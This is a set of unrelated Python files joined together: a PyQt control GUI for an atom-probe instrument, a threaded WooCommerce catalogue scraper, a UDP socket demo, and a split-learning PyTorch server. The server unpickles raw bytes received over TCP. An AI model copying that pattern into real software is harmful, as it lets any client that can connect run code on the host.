variables.counter_source = str(self.counter_source.currentText())
if self.criteria_time.isChecked():
variables.criteria_time = True
elif not self.criteria_time.isChecked():
variables.criteria_time = False
if self.criteria_ions.isChecked():
variables.criteria_ions = True
elif not self.criteria_ions.isChecked():
variables.criteria_ions = False
if self.criteria_vdc.isChecked():
variables.criteria_vdc = True
elif not self.criteria_vdc.isChecked():
variables.criteria_vdc = False
if variables.counter_source == 'TDC_Raw':
variables.raw_mode = True
if self.tweet.currentText() == 'Yes':
variables.tweet = True
# Read the experiment counter
with open('./png/counter.txt') as f:
variables.counter = int(f.readlines()[0])
# Current time and date
now = datetime.datetime.now()
exp_name = "%s_" % variables.counter + \
now.strftime("%b-%d-%Y_%H-%M") + "_%s" % variables.hdf5_path
variables.path = 'D:\\pyoxcart\\data\\%s' % exp_name
# Create folder to save the data
if not os.path.isdir(variables.path):
os.makedirs(variables.path, mode=0o777, exist_ok=True)
# start the run method of the MainThread class, which runs the main function of oxcart.py
self.thread.start()
if self.parameters_source.currentText() == 'TextLine':
variables.index_line += 1 # increase the index line of TextLine to read the second line in next step
else:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">!!! First Close all "
"Gates !!!</span></p></body></html>"))
def finished_thread_main(self):
"""
The function that is run after end of experiment(MainThread)
"""
self.start_button.setEnabled(True)
self.stop_button.setEnabled(True)
QScreen.grabWindow(app.primaryScreen(),
QApplication.desktop().winId()).save(variables.path + '\\screenshot.png')
if variables.index_line < self.num_line: # Do next experiment in case of TextLine
self.thread_main()
else:
variables.index_line = 0
def stop_ex(self):
"""
The function that is run if STOP button is pressed
"""
if variables.start_flag:
variables.stop_flag = True # Set the STOP flag
self.stop_button.setEnabled(False) # Disable the stop button
print('STOP Flag is set:', variables.stop_flag)
def gates(self, gate_num):
"""
The function for closing or opening gates
"""
def switch_gate(num):
"""
The function for applying the command of closing or opening gate
"""
with nidaqmx.Task() as task:
task.do_channels.add_do_chan('Dev2/port0/line%s' % num)
task.start()
task.write([True])
time.sleep(.5)
task.write([False])
# Main gate
if not variables.start_flag and gate_num == 1 and not variables.flag_load_gate and not variables.flag_cryo_gate and variables.flag_pump_load_lock:
if not variables.flag_main_gate: # Open the main gate
switch_gate(0)
self.led_main_chamber.setPixmap(self.led_green)
self.diagram.setPixmap(self.diagram_main_open)
variables.flag_main_gate = True
elif variables.flag_main_gate: # Close the main gate
switch_gate(1)
self.led_main_chamber.setPixmap(self.led_red)
self.diagram.setPixmap(self.diagram_close_all)
variables.flag_main_gate = False
# Buffer gate
elif not variables.start_flag and gate_num == 2 and not variables.flag_main_gate and not variables.flag_cryo_gate and variables.flag_pump_load_lock:
if not variables.flag_load_gate: # Open the load lock gate
switch_gate(2)
self.led_load_lock.setPixmap(self.led_green)
self.diagram.setPixmap(self.diagram_load_open)
variables.flag_load_gate = True
elif variables.flag_load_gate: # Close the load lock gate
switch_gate(3)
self.led_load_lock.setPixmap(self.led_red)
self.diagram.setPixmap(self.diagram_close_all)
variables.flag_load_gate = False
# Cryo gate
elif not variables.start_flag and gate_num == 3 and not variables.flag_main_gate and not variables.flag_load_gate and variables.flag_pump_load_lock:
if not variables.flag_cryo_gate: # Open the cryo gate
switch_gate(4)
self.led_cryo.setPixmap(self.led_green)
self.diagram.setPixmap(self.diagram_cryo_open)
variables.flag_cryo_gate = True
elif variables.flag_cryo_gate: # Close the cryo gate
switch_gate(5)
self.led_cryo.setPixmap(self.led_red)
self.diagram.setPixmap(self.diagram_close_all)
variables.flag_cryo_gate = False
# Show the error message in the GUI
else:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">!!! First Close all "
"the Gates and switch on the pump !!!</span></p></body></html>"))
def pump_switch(self):
"""
The function for Switching the Load Lock pump
"""
if not variables.start_flag and not variables.flag_main_gate and not variables.flag_cryo_gate \
and not variables.flag_load_gate:
if variables.flag_pump_load_lock:
variables.flag_pump_load_lock_click = True
self.pump_load_lock_switch.setEnabled(False)
elif not variables.flag_pump_load_lock:
variables.flag_pump_load_lock_click = True
self.pump_load_lock_switch.setEnabled(False)
else: # Show the error message in the GUI
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">!!! First Close all "
"the Gates !!!</span></p></body></html>"))
def light_switch(self):
"""
The function for switching the exposure time of the cameras when the light is switched
"""
if not variables.light:
self.led_light.setPixmap(self.led_green)
Camera.light_switch(self)
self.timer1.setInterval(500)
variables.light = True
variables.sample_adjust = True
variables.light_swich = True
elif variables.light:
self.led_light.setPixmap(self.led_red)
Camera.light_switch(self)
self.timer1.setInterval(500)
variables.light = False
variables.sample_adjust = False
variables.light_swich = False
def thread_worker(self, target):
"""
The function for creating workers
"""
return threading.Thread(target=target)
def update_plot_data(self):
"""
The function for updating plots
"""
# Temperature
self.x_tem = self.x_tem[1:] # Remove the first element.
self.x_tem = np.append(self.x_tem, self.x_tem[-1] + 1) # Add a new value 1 higher than the last.
self.y_tem = self.y_tem[1:] # Remove the first element.
try:
self.y_tem = np.append(self.y_tem, int(variables.temperature))
self.data_line_tem.setData(self.x_tem, self.y_tem)
except:
print(
f"{initialize_devices.bcolors.FAIL}Error: Cannot read the temperature{initialize_devices.bcolors.ENDC}")
if variables.index_auto_scale_graph == 30:
self.temperature.enableAutoRange(axis='x')
self.vdc_time.enableAutoRange(axis='x')
self.detection_rate_viz.enableAutoRange(axis='x')
variables.index_auto_scale_graph = 0
self.temperature.disableAutoRange()
self.vdc_time.disableAutoRange()
self.detection_rate_viz.disableAutoRange()
variables.index_auto_scale_graph += 1
if variables.plot_clear_flag:
self.x_vdc = np.arange(1000) # 1000 time points
self.y_vdc = np.zeros(1000) # 1000 data points
self.y_vdc[:] = np.nan
self.y_vps = np.zeros(1000) # 1000 data points
self.y_vps[:] = np.nan
self.data_line_vdc.setData(self.x_vdc, self.y_vdc)
self.data_line_vps.setData(self.x_vdc, self.y_vps)
self.x_dtec = np.arange(1000)
self.y_dtec = np.zeros(1000)
self.y_dtec[:] = np.nan
self.data_line_dtec.setData(self.x_dtec, self.y_dtec)
self.histogram.clear()
self.scatter.clear()
self.visualization.clear()
self.visualization.addItem(self.detector_circle)
variables.plot_clear_flag = False
variables.specimen_voltage = 0
variables.pulse_voltage = 0
variables.elapsed_time = 0
variables.total_ions = 0
variables.avg_n_count = 0
if variables.start_flag:
if variables.index_wait_on_plot_start <= 16:
variables.index_wait_on_plot_start += 1
if variables.index_wait_on_plot_start >= 8:
# V_dc and V_p
if variables.index_plot <= 999:
self.y_vdc[variables.index_plot] = int(variables.specimen_voltage) # Add a new value.
self.y_vps[variables.index_plot] = int(variables.pulse_voltage) # Add a new value.
else:
self.x_vdc = np.append(self.x_vdc,
self.x_vdc[-1] + 1) # Add a new value 1 higher than the last.
self.y_vdc = np.append(self.y_vdc, int(variables.specimen_voltage)) # Add a new value.
self.y_vps = np.append(self.y_vps, int(variables.pulse_voltage)) # Add a new value.
self.data_line_vdc.setData(self.x_vdc, self.y_vdc)
self.data_line_vps.setData(self.x_vdc, self.y_vps)
# Detection Rate Visualization
if variables.index_plot <= 999:
self.y_dtec[variables.index_plot] = int(variables.avg_n_count) # Add a new value.
else:
self.x_dtec = self.x_dtec[1:] # Remove the first element.
self.x_dtec = np.append(self.x_dtec,
self.x_dtec[-1] + 1) # Add a new value 1 higher than the last.
self.y_dtec = self.y_dtec[1:]
self.y_dtec = np.append(self.y_dtec, int(variables.avg_n_count))
self.data_line_dtec.setData(self.x_dtec, self.y_dtec)
# Increase the index
variables.index_plot += 1
# Time of Flight
if variables.counter_source == 'TDC' and variables.total_ions > 0 \
        and variables.index_wait_on_plot_start > 16 and not variables.raw_mode:
if variables.index_wait_on_plot_start > 16:
try:
def replaceZeroes(data):
min_nonzero = np.min(data[np.nonzero(data)])
data[data == 0] = min_nonzero
return data
math_to_charge = variables.t * 27.432/(1000 * 4) # Time in ns
math_to_charge = math_to_charge[math_to_charge < 5000]
# max_lenght = max(len(variables.x), len(variables.y),
# len(variables.t), len(variables.main_v_dc_dld))
# d_0 = 110 * 0.001
# e = 1.602 * 10 ** (-19)
# x_n = (((variables.x[:max_lenght]) - 1225) * (78/2450))
# y_n = (((variables.y[:max_lenght]) - 1225) * (78/2450))
# t_n = variables.t[:max_lenght] * 27.432 * 10**(-12) / 4
#
# l = np.sqrt(d_0 ** 2 + x_n ** 2 + y_n ** 2)
#
# math_to_charge = (2 * variables.main_v_dc_dld[:max_lenght] * e * t_n**2) / (l**2)
self.y_tof, self.x_tof = np.histogram(math_to_charge, bins=512)
self.histogram.clear()
self.y_tof = replaceZeroes(self.y_tof)
self.histogram.addItem(
pg.BarGraphItem(x=self.x_tof[:-1], height=np.log(self.y_tof), width=0.1, brush='r'))
except:
print(
f"{initialize_devices.bcolors.FAIL}Error: Cannot plot Histogram correctly{initialize_devices.bcolors.ENDC}")
# Visualization
try:
# adding points to the scatter plot
self.scatter.clear()
self.scatter.setSize(self.doubleSpinBox.value())
x = variables.x
y = variables.y
min_length = min(len(x), len(y))
x = variables.x[-min_length:]
y = variables.y[-min_length:]
self.scatter.setData(x=x[-variables.hit_display:],
y=y[-variables.hit_display:])
# add item to plot window
# adding scatter plot item to the plot window
self.visualization.clear()
self.visualization.addItem(self.scatter)
self.visualization.addItem(self.detector_circle)
except:
print(
f"{initialize_devices.bcolors.FAIL}Error: Cannot plot Ions correctly{initialize_devices.bcolors.ENDC}")
# save plots to the file
if variables.index_plot_save % 100 == 0:
exporter = pg.exporters.ImageExporter(self.vdc_time.plotItem)
exporter.export(variables.path + '\\v_dc_p_%s.png' % variables.index_plot_save)
exporter = pg.exporters.ImageExporter(self.detection_rate_viz.plotItem)
exporter.export(variables.path + '\\detection_rate_%s.png' % variables.index_plot_save)
exporter = pg.exporters.ImageExporter(self.visualization.plotItem)
exporter.export(variables.path + '\\visualization_%s.png' % variables.index_plot_save)
exporter = pg.exporters.ImageExporter(self.histogram.plotItem)
exporter.export(variables.path + '\\tof_%s.png' % variables.index_plot_save)
# Increase the index
variables.index_plot_save += 1
# Statistics Update
self.speciemen_voltage.setText(str(float("{:.3f}".format(variables.specimen_voltage))))
self.pulse_voltage.setText(str(float("{:.3f}".format(variables.pulse_voltage))))
self.elapsed_time.setText(str(float("{:.3f}".format(variables.elapsed_time))))
self.total_ions.setText((str(variables.total_ions)))
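# Detection rate is shown as ions per pulse in percent: avg_n_count appears to be the
# average ion count per update interval and pulse_frequency is presumably the pulse
# repetition rate in kHz (hence the *1000); the +1 guards against division by zero.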
self.detection_rate.setText(str
(float("{:.3f}".format(
(variables.avg_n_count * 100) / (1 + variables.pulse_frequency * 1000)))))
def statistics(self):
"""
The function for updating statistics in the GUI
"""
# update temperature and vacuum gauges
self.temp.display(variables.temperature)
self.vacuum_main.display(variables.vacuum_main)
self.vacuum_buffer.display(variables.vacuum_buffer)
self.vacuum_buffer_back.display('{:.2e}'.format(variables.vacuum_buffer_backing))
self.vacuum_load_lock.display('{:.2e}'.format(variables.vacuum_load_lock))
self.vacuum_load_lock_back.display('{:.2e}'.format(variables.vacuum_load_lock_backing))
if variables.flag_pump_load_lock_led == False:
self.led_pump_load_lock.setPixmap(self.led_red)
self.pump_load_lock_switch.setEnabled(True)
variables.flag_pump_load_lock_led = None
elif variables.flag_pump_load_lock_led == True:
self.led_pump_load_lock.setPixmap(self.led_green)
self.pump_load_lock_switch.setEnabled(True)
variables.flag_pump_load_lock_led = None
# Clean up the error message
if variables.index_warning_message == 15:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" "
"color:#ff0000;\"></span></p></body></html>"))
variables.index_warning_message = 0
variables.index_warning_message += 1
try:
# Update the setup parameters
variables.ex_time = int(float(self.ex_time.text()))
variables.user_name = self.ex_user.text()
variables.ex_freq = int(float(self.ex_freq.text()))
variables.max_ions = int(float(self.max_ions.text()))
variables.vdc_min = int(float(self.vdc_min.text()))
variables.detection_rate = float(self.detection_rate_init.text())
variables.hit_display = int(float(self.hit_displayed.text()))
variables.pulse_fraction = int(float(self.pulse_fraction.text())) / 100
variables.pulse_frequency = float(self.pulse_frequency.text())
variables.hdf5_path = self.ex_name.text()
variables.email = self.email.text()
variables.cycle_avg = int(float(self.cycle_avg.text()))
variables.vdc_step_up = int(float(self.vdc_steps_up.text()))
variables.vdc_step_down = int(float(self.vdc_steps_down.text()))
variables.v_p_min = int(float(self.vp_min.text()))
variables.v_p_max = int(float(self.vp_max.text()))
variables.counter_source = str(self.counter_source.currentText())
if variables.counter_source == 'Pulse Counter':
variables.counter_source = 'pulse_counter'
if self.tweet.currentText() == 'Yes':
variables.tweet = True
elif self.tweet.currentText() == 'No':
variables.tweet = False
if self.criteria_time.isChecked():
variables.criteria_time = True
elif not self.criteria_time.isChecked():
variables.criteria_time = False
if self.criteria_ions.isChecked():
variables.criteria_ions = True
elif not self.criteria_ions.isChecked():
variables.criteria_ions = False
if self.criteria_vdc.isChecked():
variables.criteria_vdc = True
elif not self.criteria_vdc.isChecked():
variables.criteria_vdc = False
# Show error message for V_dc higher than 20 kV
if int(float(self.vdc_max.text())) > 20000:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">Maximum possible "
"number is 20KV</span></p></body></html>"))
self.vdc_max.setText(_translate("OXCART", str(variables.vdc_max)))
else:
variables.vdc_max = int(float(self.vdc_max.text()))
# Show error message for V_p higher than 3281
if float(self.vp_max.text()) > 3281:
_translate = QtCore.QCoreApplication.translate
self.Error.setText(_translate("OXCART",
"<html><head/><body><p><span style=\" color:#ff0000;\">Maximum possible "
"number is 3281 V</span></p></body></html>"))
self.vp_max.setText(_translate("OXCART", str(variables.v_p_max)))
else:
variables.v_p_max = int(float(self.vp_max.text()))
except:
print(
f"{initialize_devices.bcolors.FAIL}Error: Cannot update setup parameters{initialize_devices.bcolors.ENDC}")
def update_cameras(self, ):
"""
The function for updating cameras in the GUI
"""
self.cam_s_o.setImage(variables.img0_orig, autoRange=False)
self.cam_b_o.setImage(variables.img1_orig, autoRange=False)
self.camera0_zoom = QImage(variables.img0_zoom, 1200, 500, QImage.Format_RGB888)
self.camera1_zoom = QImage(variables.img1_zoom, 1200, 500, QImage.Format_RGB888)
self.camera0_zoom = QtGui.QPixmap(self.camera0_zoom)
self.camera1_zoom = QtGui.QPixmap(self.camera1_zoom)
self.cam_s_d.setPixmap(self.camera0_zoom)
self.cam_b_d.setPixmap(self.camera1_zoom)
class MainThread(QThread):
"""
A class for creating main_thread
The run method creates a thread that runs the main function of the OXCART script
"""
signal = pyqtSignal('PyQt_PyObject')
def __init__(self, ):
QThread.__init__(self, )
# run method gets called when we start the thread
def run(self):
main_thread = oxcart.main()
self.signal.emit(main_thread)
if __name__ == "__main__":
# Initialize global experiment variables
variables.init()
# Cryovac initialized
try:
com_port_cryovac = serial.Serial(
port=initialize_devices.com_ports[variables.com_port_idx_cryovac].device, # chosen COM port
baudrate=9600, # 115200
bytesize=serial.EIGHTBITS, # 8
parity=serial.PARITY_NONE, # N
stopbits=serial.STOPBITS_ONE # 1
)
initialize_devices.initialize_cryovac(com_port_cryovac)
except Exception as e:
print('Can not initialize the Cryovac')
print(e)
# Main and Buffer vacuum gauges
try:
initialize_devices.initialize_pfeiffer_gauges()
except Exception as e:
print('Can not initialize the Pfeiffer gauges')
print(e)
# Buffer Backing vacuum gauges
try:
initialize_devices.initialize_edwards_tic_buffer_chamber()
except Exception as e:
print('Can not initialize the buffer vacuum gauges')
print(e)
# Load Lock vacuum gauges
try:
initialize_devices.initialize_edwards_tic_load_lock()
except Exception as e:
print('Can not initialize the Edwards gauges')
print(e)
# Cameras thread
try:
# Limits the amount of cameras used for grabbing.
# The bandwidth used by a FireWire camera device can be limited by adjusting the packet size.
maxCamerasToUse = 2
# The exit code of the sample application.
exitCode = 0
# Get the transport layer factory.
tlFactory = pylon.TlFactory.GetInstance()
# Get all attached devices and exit application if no device is found.
devices = tlFactory.EnumerateDevices()
if len(devices) == 0:
raise pylon.RuntimeException("No camera present.")
# Create an array of instant cameras for the found devices and avoid exceeding a maximum number of devices.
cameras = pylon.InstantCameraArray(min(len(devices), maxCamerasToUse))
# Create and attach all Pylon Devices.
for i, cam in enumerate(cameras):
cam.Attach(tlFactory.CreateDevice(devices[i]))
converter = pylon.ImageFormatConverter()
# converting to opencv bgr format
converter.OutputPixelFormat = pylon.PixelType_BGR8packed
converter.OutputBitAlignment = pylon.OutputBitAlignment_MsbAligned
camera = Camera(devices, tlFactory, cameras, converter)
except:
print('Can not initialize the Cameras')
# Thread for reading cameras
lock2 = threading.Lock()
camera_thread = threading.Thread(target=camera.update_cameras, args=(lock2,))
camera_thread.daemon = True
camera_thread.start()
lock1 = threading.Lock()
# Thread for reading gauges
gauges_thread = threading.Thread(target=initialize_devices.gauges_update, args=(lock1, com_port_cryovac))
gauges_thread.daemon = True
gauges_thread.start()
app = QtWidgets.QApplication(sys.argv)
# get display resolution
screen_resolution = app.desktop().screenGeometry()
width, height = screen_resolution.width(), screen_resolution.height()
print('Screen size is:(%s,%s)' % (width, height))
OXCART = QtWidgets.QMainWindow()
lock = threading.Lock()
ui = Ui_OXCART(camera.devices, camera.tlFactory, camera.cameras, camera.converter, lock)
ui.setupUi(OXCART)
OXCART.show()
sys.exit(app.exec_())
|
woocommerce.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@File : woocommerce.py
@Contact : douniwan@douniwan.com
@License : (C)Copyright 2021-2031, Dou-Ni-Wan
@Modify Time @Author @Version @Description
------------ ------- -------- -----------
2021/3/18 11:58 yqz 1.0 None
"""
# import lib
import json
import re
import threading
import time
import traceback
import openpyxl
import requests
import export_constants as ec
from bs4 import BeautifulSoup
class WooCommerce:
def __init__(self, site_url):
self.ses = requests.Session()
self.ses.headers.update({
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'})
site_url = site_url.rstrip('/')
self.shop_url = f'{site_url}/shop'
self.max_page = self.__get_max_page()
self.export_headers = ec.shopify_headers
def __get_max_page(self):
res = self.ses.get(self.shop_url)
res.raise_for_status()
soup = BeautifulSoup(res.text, features='lxml')
max_page = 0
for s in soup.find_all('a', class_='page-number'):
if s.string:
number_str = re.sub('[^0-9]', '', s.string)
max_page = max_page if max_page > int(number_str) else int(number_str)
return max_page
def __get_page_data(self, page_list, data_list):
for page_index in page_list:
page_response = self.ses.get(f'{self.shop_url}/page/{page_index}/')
page_response.raise_for_status()
page_soup = BeautifulSoup(page_response.text, features='lxml')
# for div in page_soup.find_all('p', class_='product-title'):
# print(div)
for p in page_soup.select('p.product-title a'):
data_list.append({'title': p.string, 'href': p['href']})
def __get_product_detail(self, data_list, item_list):
for d in data_list:
product_detail = self.ses.get(d['href'])
product_detail.raise_for_status()
detail_soup = BeautifulSoup(product_detail.text, features='lxml')
tag_list = []
for tag_a in detail_soup.select('nav.woocommerce-breadcrumb.breadcrumbs.uppercase a'):
tag_list.append(tag_a.string)
option_list = []
for tag_label in detail_soup.select('table.variations label'):
option_list.append((tag_label['for'], tag_label.string))
option_list.sort(key=lambda k: k[1])
option_key_0, option_name_0 = (f'attribute_{option_list[0][0]}', option_list[0][1]) if len(
option_list) > 0 else ('x', '')
option_key_1, option_name_1 = (f'attribute_{option_list[1][0]}', option_list[1][1]) if len(
option_list) > 1 else ('x', '')
option_key_2, option_name_2 = (f'attribute_{option_list[2][0]}', option_list[2][1]) if len(
option_list) > 2 else ('x', '')
form = detail_soup.find(class_='variations_form cart')
product_title = d['title']
handle = re.sub('[^0-9a-zA-Z]', '-', product_title).lower()
m_product = {'0': handle, '1': product_title, '2': '', '5': ','.join(tag_list),
'6': 'TRUE',
'7': option_name_0, '8': option_name_0, '9': option_name_1,
'10': option_name_1, '11': option_name_2, '12': option_name_2}
# {'5': product_tittle, '6': product_tittle, '8': 'N', '9': 'Y', '10': 'N', '11': '0', '12': 'N',
# '13': '2', '15': ','.join(tag_list), '18': 'M',
# '19': option_name_0, '20': option_name_1, '21': option_name_2,
# '47': form['data-product_id'] if form.has_attr('data-product_id') else ''}
desc = ''
description_tag = detail_soup.select_one('div#tab-description')
if description_tag:
desc = description_tag.text
p_products = []
if form and form.has_attr('data-product_variations'):
detail_json = json.loads(form['data-product_variations'])
for ds in detail_json:
# product_item = {'0': ds['variation_id'], '1': d['title'], '15': ','.join(tag_list), '18': 'P'}
product_item = {'0': handle, '1': product_title, '2': desc, '5': ','.join(tag_list),
'6': 'TRUE',
'7': option_name_0, '8': option_name_0, '9': option_name_1,
'10': option_name_1, '11': option_name_2, '12': option_name_2}
attr = ds['attributes']
if attr:
product_item['8'] = attr[option_key_0] if option_key_0 in attr else ''
product_item['10'] = attr[option_key_1] if option_key_1 in attr else ''
product_item['12'] = attr[option_key_2] if option_key_2 in attr else ''
product_item['19'] = ds['display_price']
product_item['20'] = ds['display_regular_price']
product_item['13'] = ds['sku']
product_item['14'] = ds['weight']
product_item['16'] = 0
product_item['17'] = 'continue'
product_item['18'] = 'manual'
product_item['21'] = 'TRUE'
product_item['22'] = 'manual'
product_item['24'] = ds['image']['src'] if ds['image'] and 'src' in ds['image'] else ''
product_item['26'] = ds['image']['alt'] if ds['image'] and 'alt' in ds['image'] else ''
product_item['27'] = 'FALSE'
product_item['28'] = product_title
product_item['29'] = product_title
product_item['43'] = product_item['24']
product_item['47'] = ds['variation_id']
product_item['48'] = 'P'
p_products.append(product_item)
# if not len(p_products):
# m_product['18'] = 'S'
# item_list.append(m_product)
item_list += p_products
def __export_all_data(self):
result = []
try:
ds = []
thread_cnt = 60
# //self.max_page
total_page_index = [i for i in range(1, 10 + 1)]
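# Round-robin split: thread i gets every thread_cnt-th page starting from offset i
# (empty lists are possible when there are fewer pages than threads).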
page_list = [total_page_index[i::thread_cnt] for i in range(thread_cnt)]
page_threads = []
for thread_id in range(len(page_list)):
page_threads.append(
threading.Thread(target=self.__get_page_data, args=(page_list[thread_id], ds,)))
for t in page_threads:
t.daemon = True
t.start()
for t in page_threads:
t.join()
print(f'get data list end {len(ds)}')
little_list = [ds[i::thread_cnt] for i in range(thread_cnt)]
threads = []
for thread_id in range(len(little_list)):
threads.append(
threading.Thread(target=self.__get_product_detail, args=(little_list[thread_id], result,)))
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
# for i in result:
# print(i)
except Exception as e:
print("export data error ", e)
traceback.print_exc()
return result
def export_to_excel(self, file_name):
all_data = self.__export_all_data()
wb = openpyxl.Workbook()
sheet = wb.create_sheet('export', 0)
# item_dict.has_pic,item_dict.has_video, item_dict.save_path,
# template_wb = openpyxl.load_workbook('product_import_template_shoplazza.xlsx', read_only=True)
# template_sheet = template_wb.worksheets[0]
# sheet.append()
for i in range(len(self.export_headers)):
sheet.cell(1, i + 1, self.export_headers[i])
row = 1
for d_item in all_data:
row += 1
for i in range(len(self.export_headers)):
sheet.cell(row, i + 1, d_item[str(i)] if str(i) in d_item else '')
# output_file_name = f'{save_xlsx_path}\\result.xlsx'
wb.save(rf'export\{file_name}')
wb.close()
print(f'output {file_name} success >>>>>> ')
def test(self):
self.__get_product_detail([{'href': 'https://gifnest.com/product/kb-jd13-sneaker/', 'title': 'xxx'}], [])
if __name__ == '__main__':
wo = WooCommerce('https://gifnest.com/')
# wo.test()
now = time.strftime('%Y%m%d%H%M%S')
wo.export_to_excel(f'export_{now}.xlsx')
|
udpSocket.py
|
import socket
import threading
def udpRecvfromData():
ip_port = ("", 10025)
udpRecv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
udpRecv.bind(ip_port)
while True:
print("waiting to receive data...")
data, sourceAddr = udpRecv.recvfrom(1024)
print(str(data, "utf-8"))
udpRecv.close()
def udpSendtoData():
ip_port = ("127.0.0.1", 10025)
udpSend = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
while True:
inp = input("data: ").strip()
if inp == "exit":
break
print(inp)
udpSend.sendto(bytes(inp, encoding="utf-8"), ip_port)
udpSend.close()
# start a thread that receives data in a loop
recvThread = threading.Thread(target=udpRecvfromData, name="RecvfromDataThread")
recvThread.start()
sendtoThread = threading.Thread(target=udpSendtoData, name="SendtoDataThread")
sendtoThread.start()
|
Server.py
|
import socket
import struct
import pickle
import numpy as np
import json
import torch
import torch.nn as nn
from torch.optim import Adam, SGD
from threading import Thread
import time
#load data from json file
f = open('parameter_server.json')
data = json.load(f)
f.close()
# set parameters from the json file
host = data["host"]
port = data["port"]
max_recv = data["max_recv"]
lr = data["learningrate"]
update_threshold = data["update_threshold"]
max_numclients = data["max_nr_clients"]
class Decode(nn.Module):
"""
decoder model
"""
def __init__(self):
super(Decode, self).__init__()
self.t_convx = nn.ConvTranspose2d(4, 8, 1, stride=1)
self.t_conva = nn.ConvTranspose2d(8, 16, 1, stride=1)
self.t_convb = nn.ConvTranspose2d(16, 64, 1, stride=1)
def forward(self, x):
x = self.t_convx(x)
x = self.t_conva(x)
x = self.t_convb(x)
return x
class Server(nn.Module):
"""
server model
"""
def __init__(self):
super(Server, self).__init__()
self.conv4 = nn.Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1))
self.relu4 = nn.ReLU()
self.norm4 = nn.BatchNorm2d(64)
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
self.drop2 = nn.Dropout2d(0.3)
self.conv5 = nn.Conv2d(64, 128, kernel_size=(3, 3), stride=(1, 1))
self.relu5 = nn.ReLU()
self.norm5 = nn.BatchNorm2d(128)
self.conv6 = nn.Conv2d(128, 128, kernel_size=(3, 3), stride=(1, 1))
self.relu6 = nn.ReLU()
self.norm6 = nn.BatchNorm2d(128)
self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
self.drop3 = nn.Dropout2d(0.4)
self.linear1 = nn.Linear(in_features=128, out_features=43, bias=True)
def forward(self, x):
x = self.conv4(x)
x = self.relu4(x)
x = self.norm4(x)
x = self.pool2(x)
x = self.drop2(x)
x = self.conv5(x)
x = self.relu5(x)
x = self.norm5(x)
x = self.conv6(x)
x = self.relu6(x)
x = self.norm6(x)
x = self.pool3(x)
x = self.drop3(x)
x = x.view(x.size(0), -1)
x = nn.functional.log_softmax(self.linear1(x), dim=1)
return x
class initial_Client(nn.Module):
"""
initial client model with the actual weights
"""
def __init__(self):
super(initial_Client, self).__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
self.relu1 = nn.ReLU()
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False)
self.norm1 = nn.BatchNorm2d(32)
self.conv2 = nn.Conv2d(32, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
self.relu2 = nn.ReLU()
self.norm2 = nn.BatchNorm2d(32)
self.drop1 = nn.Dropout2d(0.2)
self.conv3 = nn.Conv2d(32, 64, kernel_size=(3, 3), stride=(1, 1))
self.relu3 = nn.ReLU()
self.norm3 = nn.BatchNorm2d(64)
def forward(self, x):
x = self.conv1(x)
x = self.relu1(x)
x = self.pool1(x)
x = self.norm1(x)
x = self.conv2(x)
x = self.relu2(x)
x = self.norm2(x)
x = self.drop1(x)
x = self.conv3(x)
x = self.relu3(x)
x = self.norm3(x)
return x
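# --- Illustrative sketch (not part of the original script) -----------------------
# How the three modules above compose in this split-learning setup. The 32x32 RGB
# input size and the GTSRB-style 43 classes are assumptions for illustration; only
# the channel counts are fixed by the layer definitions.
def _example_forward_shapes():
    x = torch.randn(2, 3, 32, 32)            # a batch of 2 RGB images
    cut_layer_out = initial_Client()(x)      # (2, 64, 14, 14) activations at the cut layer
    compressed = torch.randn(2, 4, 14, 14)   # what a client would transmit after encoding
    reconstructed = Decode()(compressed)     # (2, 64, 14, 14) decoded activations
    logits = Server()(reconstructed)         # (2, 43) class log-probabilities
    return cut_layer_out.shape, reconstructed.shape, logits.shape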
def send_msg(sock, content):
"""
pickles the content (creates a bytestream), adds the length header and sends the message via the tcp port
:param sock: socket
:param content: content to send via tcp port
"""
msg = pickle.dumps(content)
msg = struct.pack('>I', len(msg)) + msg # add 4-byte length prefix in network byte order
sock.sendall(msg)
def recieve_msg(sock):
"""
receives the message with the helper function, unpickles it and separates
the getid from the actual message content,
then calls the request handler
:param
sock: socket
:return: none
"""
msg = recv_msg(sock) # receive client message from socket
msg = pickle.loads(msg)
getid = msg[0]
content = msg[1]
handle_request(sock, getid, content)
def recv_msg(sock):
"""
gets the message length (encoded in the first four bytes of the received bytestream) and then reads the payload with the recvall function
:param
sock: socket
:return: returns the data retrieved from the recvall function
"""
raw_msglen = recvall(sock, 4)
if not raw_msglen:
return None
msglen = struct.unpack('>I', raw_msglen)[0]
return recvall(sock, msglen)
def recvall(sock, n):
"""
returns the data from a received bytestream; helper function to receive n bytes or return None if EOF is hit
:param sock: socket
:param n: length in bytes (number of bytes)
:return: message
"""
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data
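# --- Illustrative sketch (not part of the original script) -----------------------
# A minimal client-side counterpart to send_msg()/recv_msg() above, assuming the same
# wire format: a 4-byte big-endian length prefix followed by a pickled [getid, content]
# list. The function name and the default host/port are hypothetical.
def _example_client_request(getid, content, server_host='127.0.0.1', server_port=50007):
    with socket.create_connection((server_host, server_port)) as s:
        payload = pickle.dumps([getid, content])
        s.sendall(struct.pack('>I', len(payload)) + payload)  # same framing as send_msg()
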